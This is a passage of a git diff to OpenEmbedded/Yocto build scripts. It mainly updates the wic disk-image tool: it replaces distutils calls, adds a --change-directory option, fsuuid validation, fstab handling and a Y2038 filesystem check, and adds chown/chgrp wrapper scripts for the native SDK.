                 pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
                 for pathvar in pathvars:
                     path = rd.getVar(pathvar)
-                    shutil.rmtree(path)
+                    if os.path.exists(path):
+                        shutil.rmtree(path)
         finally:
             if fetchrecipe:
                 try:
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
 import tempfile
 import json
 import subprocess
+import shutil
 import re
 
 from collections import namedtuple, OrderedDict
-from distutils.spawn import find_executable
 
 from wic import WicError
 from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
             for path in pathlist.split(':'):
                 self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
 
-        self.parted = find_executable("parted", self.paths)
+        self.parted = shutil.which("parted", path=self.paths)
         if not self.parted:
             raise WicError("Can't find executable parted")
 
@@ -283,7 +283,7 @@ class Disk:
                     "resize2fs", "mkswap", "mkdosfs", "debugfs"):
             aname = "_%s" % name
             if aname not in self.__dict__:
-                setattr(self, aname, find_executable(name, self.paths))
+                setattr(self, aname, shutil.which(name, path=self.paths))
                 if aname not in self.__dict__ or self.__dict__[aname] is None:
                     raise WicError("Can't find executable '{}'".format(name))
             return self.__dict__[aname]
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 1e3d06a87b..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
     meanings. The commands are based on the Fedora kickstart
     documentation but with modifications to reflect wic capabilities.
 
-      http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition
-      http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader
+      https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
+      https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
 
   Commands
 
@@ -980,6 +980,12 @@ DESCRIPTION
                          copies. This option only has an effect with the rootfs
                          source plugin.
 
+         --change-directory: This option is specific to wic. It changes to the
+                             given directory before copying the files. This
+                             option is useful when we want to split a rootfs in
+                             multiple partitions and we want to keep the right
+                             permissions and usernames in all the partitions.
+
          --extra-space: This option is specific to wic. It adds extra
                         space after the space filled by the content
                         of the partition. The final size can go
diff --git a/scripts/lib/wic/ksparser.py b/scripts/lib/wic/ksparser.py
index 76cc55b848..452a160232 100644
--- a/scripts/lib/wic/ksparser.py
+++ b/scripts/lib/wic/ksparser.py
@@ -152,6 +152,7 @@ class KickStart():
         part.add_argument('--offset', type=sizetype("K", True))
         part.add_argument('--exclude-path', nargs='+')
         part.add_argument('--include-path', nargs='+')
+        part.add_argument('--change-directory')
         part.add_argument("--extra-space", type=sizetype("M"))
         part.add_argument('--fsoptions', dest='fsopts')
         part.add_argument('--fstype', default='vfat',
@@ -228,6 +229,23 @@ class KickStart():
                                 err = "%s:%d: SquashFS does not support LABEL" \
                                        % (confpath, lineno)
                                 raise KickStartError(err)
+                        if parsed.fstype == 'msdos' or parsed.fstype == 'vfat':
+                            if parsed.fsuuid:
+                                if parsed.fsuuid.upper().startswith('0X'):
+                                    if len(parsed.fsuuid) > 10:
+                                        err = "%s:%d: fsuuid %s given in wks kickstart file " \
+                                              "exceeds the length limit for %s filesystem. " \
+                                              "It should be in the form of a 32 bit hexadecimal" \
+                                              "number (for example, 0xABCD1234)." \
+                                              % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+                                        raise KickStartError(err)
+                                elif len(parsed.fsuuid) > 8:
+                                    err = "%s:%d: fsuuid %s given in wks kickstart file " \
+                                          "exceeds the length limit for %s filesystem. " \
+                                          "It should be in the form of a 32 bit hexadecimal" \
+                                          "number (for example, 0xABCD1234)." \
+                                          % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+                                    raise KickStartError(err)
                         if parsed.use_label and not parsed.label:
                             err = "%s:%d: Must set the label with --label" \
                                   % (confpath, lineno)
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index fe4abe8115..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
 import os
 import re
 import subprocess
+import shutil
 
 from collections import defaultdict
-from distutils import spawn
 
 from wic import WicError
 
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
 
 # executable -> recipe pairs for exec_native_cmd
 NATIVE_RECIPES = {"bmaptool": "bmap-tools",
+                  "dumpe2fs": "e2fsprogs",
                   "grub-mkimage": "grub-efi",
                   "isohybrid": "syslinux",
                   "mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
                   "parted": "parted",
                   "sfdisk": "util-linux",
                   "sgdisk": "gptfdisk",
-                  "syslinux": "syslinux"
+                  "syslinux": "syslinux",
+                  "tar": "tar"
                  }
 
 def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
     """
     return _exec_cmd(cmd_and_args, as_shell)[1]
 
+def find_executable(cmd, paths):
+    recipe = cmd
+    if recipe in NATIVE_RECIPES:
+        recipe =  NATIVE_RECIPES[recipe]
+    provided = get_bitbake_var("ASSUME_PROVIDED")
+    if provided and "%s-native" % recipe in provided:
+        return True
+
+    return shutil.which(cmd, path=paths)
 
 def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
     """
@@ -128,16 +139,19 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
     if pseudo:
         cmd_and_args = pseudo + cmd_and_args
 
-    native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin" % \
+    hosttools_dir = get_bitbake_var("HOSTTOOLS_DIR")
+
+    native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin:%s" % \
                    (native_sysroot, native_sysroot,
-                    native_sysroot, native_sysroot)
+                    native_sysroot, native_sysroot,
+                    hosttools_dir)
 
     native_cmd_and_args = "export PATH=%s:$PATH;%s" % \
                    (native_paths, cmd_and_args)
     logger.debug("exec_native_cmd: %s", native_cmd_and_args)
 
     # If the command isn't in the native sysroot say we failed.
-    if spawn.find_executable(args[0], native_paths):
+    if find_executable(args[0], native_paths):
         ret, out = _exec_cmd(native_cmd_and_args, True)
     else:
         ret = 127
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index 3490b4e75d..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -31,6 +31,7 @@ class Partition():
         self.extra_space = args.extra_space
         self.exclude_path = args.exclude_path
         self.include_path = args.include_path
+        self.change_directory = args.change_directory
         self.fsopts = args.fsopts
         self.fstype = args.fstype
         self.label = args.label
@@ -53,6 +54,9 @@ class Partition():
         self.uuid = args.uuid
         self.fsuuid = args.fsuuid
         self.type = args.type
+        self.updated_fstab_path = None
+        self.has_fstab = False
+        self.update_fstab_in_rootfs = False
 
         self.lineno = lineno
         self.source_file = ""
@@ -100,7 +104,7 @@ class Partition():
                 extra_blocks = self.extra_space
 
             rootfs_size = actual_rootfs_size + extra_blocks
-            rootfs_size *= self.overhead_factor
+            rootfs_size = int(rootfs_size * self.overhead_factor)
 
             logger.debug("Added %d extra blocks to %s to get to %d total blocks",
                          extra_blocks, self.mountpoint, rootfs_size)
@@ -117,11 +121,15 @@ class Partition():
         return self.fixed_size if self.fixed_size else self.size
 
     def prepare(self, creator, cr_workdir, oe_builddir, rootfs_dir,
-                bootimg_dir, kernel_dir, native_sysroot):
+                bootimg_dir, kernel_dir, native_sysroot, updated_fstab_path):
         """
         Prepare content for individual partitions, depending on
         partition command parameters.
         """
+        self.updated_fstab_path = updated_fstab_path
+        if self.updated_fstab_path and not (self.fstype.startswith("ext") or self.fstype == "msdos"):
+            self.update_fstab_in_rootfs = True
+
         if not self.source:
             if not self.size and not self.fixed_size:
                 raise WicError("The %s partition has a size of zero. Please "
@@ -191,29 +199,40 @@ class Partition():
                            (self.mountpoint, self.size, self.fixed_size))
 
     def prepare_rootfs(self, cr_workdir, oe_builddir, rootfs_dir,
-                       native_sysroot, real_rootfs = True):
+                       native_sysroot, real_rootfs = True, pseudo_dir = None):
         """
         Prepare content for a rootfs partition i.e. create a partition
         and fill it from a /rootfs dir.
 
         Currently handles ext2/3/4, btrfs, vfat and squashfs.
         """
-        p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
-        p_localstatedir = os.environ.get("PSEUDO_LOCALSTATEDIR",
-                                         "%s/../pseudo" %  rootfs_dir)
-        p_passwd = os.environ.get("PSEUDO_PASSWD", rootfs_dir)
-        p_nosymlinkexp = os.environ.get("PSEUDO_NOSYMLINKEXP", "1")
-        pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
-        pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % p_localstatedir
-        pseudo += "export PSEUDO_PASSWD=%s;" % p_passwd
-        pseudo += "export PSEUDO_NOSYMLINKEXP=%s;" % p_nosymlinkexp
-        pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
 
         rootfs = "%s/rootfs_%s.%s.%s" % (cr_workdir, self.label,
                                          self.lineno, self.fstype)
         if os.path.isfile(rootfs):
             os.remove(rootfs)
 
+        p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
+        if (pseudo_dir):
+            # Canonicalize the ignore paths. This corresponds to
+            # calling oe.path.canonicalize(), which is used in bitbake.conf.
+            ignore_paths = [rootfs] + (get_bitbake_var("PSEUDO_IGNORE_PATHS") or "").split(",")
+            canonical_paths = []
+            for path in ignore_paths:
+                if "$" not in path:
+                    trailing_slash = path.endswith("/") and "/" or ""
+                    canonical_paths.append(os.path.realpath(path) + trailing_slash)
+            ignore_paths = ",".join(canonical_paths)
+
+            pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
+            pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+            pseudo += "export PSEUDO_PASSWD=%s;" % rootfs_dir
+            pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+            pseudo += "export PSEUDO_IGNORE_PATHS=%s;" % ignore_paths
+            pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+        else:
+            pseudo = None
+
         if not self.size and real_rootfs:
             # The rootfs size is not set in .ks file so try to get it
             # from bitbake variable
@@ -235,7 +254,7 @@ class Partition():
 
         prefix = "ext" if self.fstype.startswith("ext") else self.fstype
         method = getattr(self, "prepare_rootfs_" + prefix)
-        method(rootfs, oe_builddir, rootfs_dir, native_sysroot, pseudo)
+        method(rootfs, cr_workdir, oe_builddir, rootfs_dir, native_sysroot, pseudo)
         self.source_file = rootfs
 
         # get the rootfs size in the right units for kickstart (kB)
@@ -243,7 +262,7 @@ class Partition():
         out = exec_cmd(du_cmd)
         self.size = int(out.split()[0])
 
-    def prepare_rootfs_ext(self, rootfs, oe_builddir, rootfs_dir,
+    def prepare_rootfs_ext(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
                            native_sysroot, pseudo):
         """
         Prepare content for an ext2/3/4 rootfs partition.
@@ -267,10 +286,21 @@ class Partition():
             (self.fstype, extraopts, rootfs, label_str, self.fsuuid, rootfs_dir)
         exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
 
+        if self.updated_fstab_path and self.has_fstab:
+            debugfs_script_path = os.path.join(cr_workdir, "debugfs_script")
+            with open(debugfs_script_path, "w") as f:
+                f.write("cd etc\n")
+                f.write("rm fstab\n")
+                f.write("write %s fstab\n" % (self.updated_fstab_path))
+            debugfs_cmd = "debugfs -w -f %s %s" % (debugfs_script_path, rootfs)
+            exec_native_cmd(debugfs_cmd, native_sysroot)
+
         mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
         exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
 
-    def prepare_rootfs_btrfs(self, rootfs, oe_builddir, rootfs_dir,
+        self.check_for_Y2038_problem(rootfs, native_sysroot)
+
+    def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
                              native_sysroot, pseudo):
         """
         Prepare content for a btrfs rootfs partition.
@@ -293,7 +323,7 @@ class Partition():
              self.mkfs_extraopts, self.fsuuid, rootfs)
         exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
 
-    def prepare_rootfs_msdos(self, rootfs, oe_builddir, rootfs_dir,
+    def prepare_rootfs_msdos(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
                              native_sysroot, pseudo):
         """
         Prepare content for a msdos/vfat rootfs partition.
@@ -322,12 +352,16 @@ class Partition():
         mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (rootfs, rootfs_dir)
         exec_native_cmd(mcopy_cmd, native_sysroot)
 
+        if self.updated_fstab_path and self.has_fstab:
+            mcopy_cmd = "mcopy -i %s %s ::/etc/fstab" % (rootfs, self.updated_fstab_path)
+            exec_native_cmd(mcopy_cmd, native_sysroot)
+
         chmod_cmd = "chmod 644 %s" % rootfs
         exec_cmd(chmod_cmd)
 
     prepare_rootfs_vfat = prepare_rootfs_msdos
 
-    def prepare_rootfs_squashfs(self, rootfs, oe_builddir, rootfs_dir,
+    def prepare_rootfs_squashfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
                                 native_sysroot, pseudo):
         """
         Prepare content for a squashfs rootfs partition.
@@ -356,6 +390,8 @@ class Partition():
             (self.fstype, extraopts, label_str, self.fsuuid, rootfs)
         exec_native_cmd(mkfs_cmd, native_sysroot)
 
+        self.check_for_Y2038_problem(rootfs, native_sysroot)
+
     def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
                                       native_sysroot):
         """
@@ -417,3 +453,37 @@ class Partition():
 
         mkswap_cmd = "mkswap %s -U %s %s" % (label_str, self.fsuuid, path)
         exec_native_cmd(mkswap_cmd, native_sysroot)
+
+    def check_for_Y2038_problem(self, rootfs, native_sysroot):
+        """
+        Check if the filesystem is affected by the Y2038 problem
+        (Y2038 problem = 32 bit time_t overflow in January 2038)
+        """
+        def get_err_str(part):
+            err = "The {} filesystem {} has no Y2038 support."
+            if part.mountpoint:
+                args = [part.fstype, "mounted at %s" % part.mountpoint]
+            elif part.label:
+                args = [part.fstype, "labeled '%s'" % part.label]
+            elif part.part_name:
+                args = [part.fstype, "in partition '%s'" % part.part_name]
+            else:
+                args = [part.fstype, "in partition %s" % part.num]
+            return err.format(*args)
+
+        # ext2 and ext3 are always affected by the Y2038 problem
+        if self.fstype in ["ext2", "ext3"]:
+            logger.warn(get_err_str(self))
+            return
+
+        ret, out = exec_native_cmd("dumpe2fs %s" % rootfs, native_sysroot)
+
+        # if ext4 is affected by the Y2038 problem depends on the inode size
+        for line in out.splitlines():
+            if line.startswith("Inode size:"):
+                size = int(line.split(":")[1].strip())
+                if size < 256:
+                    logger.warn("%s Inodes (of size %d) are too small." %
+                                (get_err_str(self), size))
+                break
+
diff --git a/scripts/lib/wic/pluginbase.py b/scripts/lib/wic/pluginbase.py
index d9b4e57747..b64568339b 100644
--- a/scripts/lib/wic/pluginbase.py
+++ b/scripts/lib/wic/pluginbase.py
@@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin']
 
 import os
 import logging
+import types
 
 from collections import defaultdict
-from importlib.machinery import SourceFileLoader
+import importlib
+import importlib.util
 
 from wic import WicError
 from wic.misc import get_bitbake_var
@@ -54,7 +56,9 @@ class PluginMgr:
                             mname = fname[:-3]
                             mpath = os.path.join(ppath, fname)
                             logger.debug("loading plugin module %s", mpath)
-                            SourceFileLoader(mname, mpath).load_module()
+                            spec = importlib.util.spec_from_file_location(mname, mpath)
+                            module = importlib.util.module_from_spec(spec)
+                            spec.loader.exec_module(module)
 
         return PLUGINS.get(ptype)
 
diff --git a/scripts/lib/wic/plugins/imager/direct.py b/scripts/lib/wic/plugins/imager/direct.py
index 55db826e93..42704d1e10 100644
--- a/scripts/lib/wic/plugins/imager/direct.py
+++ b/scripts/lib/wic/plugins/imager/direct.py
@@ -58,11 +58,11 @@ class DirectPlugin(ImagerPlugin):
         self.compressor = options.compressor
         self.bmap = options.bmap
         self.no_fstab_update = options.no_fstab_update
-        self.original_fstab = None
+        self.updated_fstab_path = None
 
         self.name = "%s-%s" % (os.path.splitext(os.path.basename(wks_file))[0],
                                strftime("%Y%m%d%H%M"))
-        self.workdir = tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+        self.workdir = self.setup_workdir(options.workdir)
         self._image = None
         self.ptable_format = self.ks.bootloader.ptable
         self.parts = self.ks.partitions
@@ -78,6 +78,16 @@ class DirectPlugin(ImagerPlugin):
         self._image = PartitionedImage(image_path, self.ptable_format,
                                        self.parts, self.native_sysroot)
 
+    def setup_workdir(self, workdir):
+        if workdir:
+            if os.path.exists(workdir):
+                raise WicError("Internal workdir '%s' specified in wic arguments already exists!" % (workdir))
+
+            os.makedirs(workdir)
+            return workdir
+        else:
+            return tempfile.mkdtemp(dir=self.outdir, prefix='tmp.wic.')
+
     def do_create(self):
         """
         Plugin entry point.
@@ -90,11 +100,8 @@ class DirectPlugin(ImagerPlugin):
         finally:
             self.cleanup()
 
-    def _write_fstab(self, image_rootfs):
-        """overriden to generate fstab (temporarily) in rootfs. This is called
-        from _create, make sure it doesn't get called from
-        BaseImage.create()
-        """
+    def update_fstab(self, image_rootfs):
+        """Assume partition order same as in wks"""
         if not image_rootfs:
             return
 
@@ -104,20 +111,11 @@ class DirectPlugin(ImagerPlugin):
 
         with open(fstab_path) as fstab:
             fstab_lines = fstab.readlines()
-            self.original_fstab = fstab_lines.copy()
-
-        if self._update_fstab(fstab_lines, self.parts):
-            with open(fstab_path, "w") as fstab:
-                fstab.writelines(fstab_lines)
-        else:
-            self.original_fstab = None
 
-    def _update_fstab(self, fstab_lines, parts):
-        """Assume partition order same as in wks"""
         updated = False
-        for part in parts:
+        for part in self.parts:
             if not part.realnum or not part.mountpoint \
-               or part.mountpoint == "/":
+               or part.mountpoint == "/" or not (part.mountpoint.startswith('/') or part.mountpoint == "swap"):
                 continue
 
             if part.use_uuid:
@@ -144,7 +142,10 @@ class DirectPlugin(ImagerPlugin):
             fstab_lines.append(line)
             updated = True
 
-        return updated
+        if updated:
+            self.updated_fstab_path = os.path.join(self.workdir, "fstab")
+            with open(self.updated_fstab_path, "w") as f:
+                f.writelines(fstab_lines)
 
     def _full_path(self, path, name, extention):
         """ Construct full file path to a file we generate. """
@@ -160,7 +161,7 @@ class DirectPlugin(ImagerPlugin):
         a partitioned image.
         """
         if not self.no_fstab_update:
-            self._write_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
+            self.update_fstab(self.rootfs_dir.get("ROOTFS_DIR"))
 
         for part in self.parts:
             # get rootfs size from bitbake variable if it's not set in .ks file
@@ -273,12 +274,6 @@ class DirectPlugin(ImagerPlugin):
             if os.path.isfile(path):
                 shutil.move(path, os.path.join(self.outdir, fname))
 
-        #Restore original fstab
-        if self.original_fstab:
-            fstab_path = self.rootfs_dir.get("ROOTFS_DIR") + "/etc/fstab"
-            with open(fstab_path, "w") as fstab:
-                fstab.writelines(self.original_fstab)
-
         # remove work directory
         shutil.rmtree(self.workdir, ignore_errors=True)
 
@@ -343,6 +338,13 @@ class PartitionedImage():
                     part.fsuuid = '0x' + str(uuid.uuid4())[:8].upper()
                 else:
                     part.fsuuid = str(uuid.uuid4())
+            else:
+                #make sure the fsuuid for vfat/msdos align with format 0xYYYYYYYY
+                if part.fstype == 'vfat' or part.fstype == 'msdos':
+                    if part.fsuuid.upper().startswith("0X"):
+                        part.fsuuid = '0x' + part.fsuuid.upper()[2:].rjust(8,"0")
+                    else:
+                        part.fsuuid = '0x' + part.fsuuid.upper().rjust(8,"0")
 
     def prepare(self, imager):
         """Prepare an image. Call prepare method of all image partitions."""
@@ -351,7 +353,8 @@ class PartitionedImage():
             # sizes before we can add them and do the layout.
             part.prepare(imager, imager.workdir, imager.oe_builddir,
                          imager.rootfs_dir, imager.bootimg_dir,
-                         imager.kernel_dir, imager.native_sysroot)
+                         imager.kernel_dir, imager.native_sysroot,
+                         imager.updated_fstab_path)
 
             # Converting kB to sectors for parted
             part.size_sec = part.disk_size * 1024 // self.sector_size
diff --git a/scripts/lib/wic/plugins/source/bootimg-efi.py b/scripts/lib/wic/plugins/source/bootimg-efi.py
index 2cfdc10ecd..05e8471116 100644
--- a/scripts/lib/wic/plugins/source/bootimg-efi.py
+++ b/scripts/lib/wic/plugins/source/bootimg-efi.py
@@ -277,6 +277,13 @@ class BootimgEFIPlugin(SourcePlugin):
         logger.debug("Added %d extra blocks to %s to get to %d total blocks",
                      extra_blocks, part.mountpoint, blocks)
 
+        # required for compatibility with certain devices expecting file system
+        # block count to be equal to partition block count
+        if blocks < part.fixed_size:
+            blocks = part.fixed_size
+            logger.debug("Overriding %s to %d total blocks for compatibility",
+                     part.mountpoint, blocks)
+
         # dosfs image, created by mkdosfs
         bootimg = "%s/boot.img" % cr_workdir
 
diff --git a/scripts/lib/wic/plugins/source/bootimg-partition.py b/scripts/lib/wic/plugins/source/bootimg-partition.py
index 138986a71e..5dbe2558d2 100644
--- a/scripts/lib/wic/plugins/source/bootimg-partition.py
+++ b/scripts/lib/wic/plugins/source/bootimg-partition.py
@@ -141,7 +141,7 @@ class BootimgPartitionPlugin(SourcePlugin):
                     break
 
             if not kernel_name:
-                raise WicError('No kernel file founded')
+                raise WicError('No kernel file found')
 
             # Compose the extlinux.conf
             extlinux_conf = "default Yocto\n"
diff --git a/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
index f2639e7004..32e47f1831 100644
--- a/scripts/lib/wic/plugins/source/bootimg-pcbios.py
+++ b/scripts/lib/wic/plugins/source/bootimg-pcbios.py
@@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin):
         # dosfs image, created by mkdosfs
         bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno)
 
-        dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \
-                    (part.fsuuid, bootimg, blocks)
+        label = part.label if part.label else "boot"
+
+        dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \
+                    (label, part.fsuuid, bootimg, blocks)
         exec_native_cmd(dosfs_cmd, native_sysroot)
 
         mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir)
diff --git a/scripts/lib/wic/plugins/source/rootfs.py b/scripts/lib/wic/plugins/source/rootfs.py
index 705aeb5563..c8c1c0f58f 100644
--- a/scripts/lib/wic/plugins/source/rootfs.py
+++ b/scripts/lib/wic/plugins/source/rootfs.py
@@ -20,7 +20,7 @@ from oe.path import copyhardlinktree
 
 from wic import WicError
 from wic.pluginbase import SourcePlugin
-from wic.misc import get_bitbake_var
+from wic.misc import get_bitbake_var, exec_native_cmd
 
 logger = logging.getLogger('wic')
 
@@ -44,6 +44,15 @@ class RootfsPlugin(SourcePlugin):
 
         return os.path.realpath(image_rootfs_dir)
 
+    @staticmethod
+    def __get_pseudo(native_sysroot, rootfs, pseudo_dir):
+        pseudo = "export PSEUDO_PREFIX=%s/usr;" % native_sysroot
+        pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % pseudo_dir
+        pseudo += "export PSEUDO_PASSWD=%s;" % rootfs
+        pseudo += "export PSEUDO_NOSYMLINKEXP=1;"
+        pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
+        return pseudo
+
     @classmethod
     def do_prepare_partition(cls, part, source_params, cr, cr_workdir,
                              oe_builddir, bootimg_dir, kernel_dir,
@@ -68,18 +77,55 @@ class RootfsPlugin(SourcePlugin):
                                "it is not a valid path, exiting" % part.rootfs_dir)
 
         part.rootfs_dir = cls.__get_rootfs_dir(rootfs_dir)
+        part.has_fstab = os.path.exists(os.path.join(part.rootfs_dir, "etc/fstab"))
+        pseudo_dir = os.path.join(part.rootfs_dir, "../pseudo")
+        if not os.path.lexists(pseudo_dir):
+            logger.warn("%s folder does not exist. "
+                        "Usernames and permissions will be invalid " % pseudo_dir)
+            pseudo_dir = None
 
         new_rootfs = None
+        new_pseudo = None
         # Handle excluded paths.
-        if part.exclude_path or part.include_path:
-            # We need a new rootfs directory we can delete files from. Copy to
-            # workdir.
+        if part.exclude_path or part.include_path or part.change_directory or part.update_fstab_in_rootfs:
+            # We need a new rootfs directory we can safely modify without
+            # interfering with other tasks. Copy to workdir.
             new_rootfs = os.path.realpath(os.path.join(cr_workdir, "rootfs%d" % part.lineno))
 
             if os.path.lexists(new_rootfs):
                 shutil.rmtree(os.path.join(new_rootfs))
 
-            copyhardlinktree(part.rootfs_dir, new_rootfs)
+            if part.change_directory:
+                cd = part.change_directory
+                if cd[-1] == '/':
+                    cd = cd[:-1]
+                if os.path.isabs(cd):
+                    logger.error("Must be relative: --change-directory=%s" % cd)
+                    sys.exit(1)
+                orig_dir = os.path.realpath(os.path.join(part.rootfs_dir, cd))
+                if not orig_dir.startswith(part.rootfs_dir):
+                    logger.error("'%s' points to a path outside the rootfs" % orig_dir)
+                    sys.exit(1)
+
+            else:
+                orig_dir = part.rootfs_dir
+            copyhardlinktree(orig_dir, new_rootfs)
+
+            # Convert the pseudo directory to its new location
+            if (pseudo_dir):
+                new_pseudo = os.path.realpath(
+                             os.path.join(cr_workdir, "pseudo%d" % part.lineno))
+                if os.path.lexists(new_pseudo):
+                    shutil.rmtree(new_pseudo)
+                os.mkdir(new_pseudo)
+                shutil.copy(os.path.join(pseudo_dir, "files.db"),
+                            os.path.join(new_pseudo, "files.db"))
+
+                pseudo_cmd = "%s -B -m %s -M %s" % (cls.__get_pseudo(native_sysroot,
+                                                                     new_rootfs,
+                                                                     new_pseudo),
+                                                    orig_dir, new_rootfs)
+                exec_native_cmd(pseudo_cmd, native_sysroot)
 
             for path in part.include_path or []:
                 copyhardlinktree(path, new_rootfs)
@@ -99,17 +145,34 @@ class RootfsPlugin(SourcePlugin):
                     logger.error("'%s' points to a path outside the rootfs" % orig_path)
                     sys.exit(1)
 
+                if new_pseudo:
+                    pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+                else:
+                    pseudo = None
                 if path.endswith(os.sep):
                     # Delete content only.
                     for entry in os.listdir(full_path):
                         full_entry = os.path.join(full_path, entry)
-                        if os.path.isdir(full_entry) and not os.path.islink(full_entry):
-                            shutil.rmtree(full_entry)
-                        else:
-                            os.remove(full_entry)
+                        rm_cmd = "rm -rf %s" % (full_entry)
+                        exec_native_cmd(rm_cmd, native_sysroot, pseudo)
                 else:
                     # Delete whole directory.
-                    shutil.rmtree(full_path)
+                    rm_cmd = "rm -rf %s" % (full_path)
+                    exec_native_cmd(rm_cmd, native_sysroot, pseudo)
+
+            # Update part.has_fstab here as fstab may have been added or
+            # removed by the above modifications.
+            part.has_fstab = os.path.exists(os.path.join(new_rootfs, "etc/fstab"))
+            if part.update_fstab_in_rootfs and part.has_fstab:
+                fstab_path = os.path.join(new_rootfs, "etc/fstab")
+                # Assume that fstab should always be owned by root with fixed permissions
+                install_cmd = "install -m 0644 %s %s" % (part.updated_fstab_path, fstab_path)
+                if new_pseudo:
+                    pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+                else:
+                    pseudo = None
+                exec_native_cmd(install_cmd, native_sysroot, pseudo)
 
         part.prepare_rootfs(cr_workdir, oe_builddir,
-                            new_rootfs or part.rootfs_dir, native_sysroot)
+                            new_rootfs or part.rootfs_dir, native_sysroot,
+                            pseudo_dir = new_pseudo or pseudo_dir)
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chgrp' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chgrp'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chgrp = shutil.which('chgrp', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+    if i.startswith("-"):
+        args.append(i)
+        continue
+    if not found:
+        args.append("root")
+        found = True
+    else:
+        args.append(i)
+
+os.execv(real_chgrp, args)
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chown' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chown'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chown = shutil.which('chown', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+    if i.startswith("-"):
+        args.append(i)
+        continue
+    if not found:
+        args.append("root:root")
+        found = True
+    else:
+        args.append(i)
+
+os.execv(real_chown, args)
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
     def __init__(self):
         parser = argparse.ArgumentParser(
             description="Analyse recipe-depends.dot generated by bitbake -g",
-            epilog="Use %(prog)s --help to get help")
+            formatter_class=argparse.RawDescriptionHelpFormatter)
         parser.add_argument("dotfile",
             help = "Specify the dotfile", nargs = 1, action='store', default='')
         parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
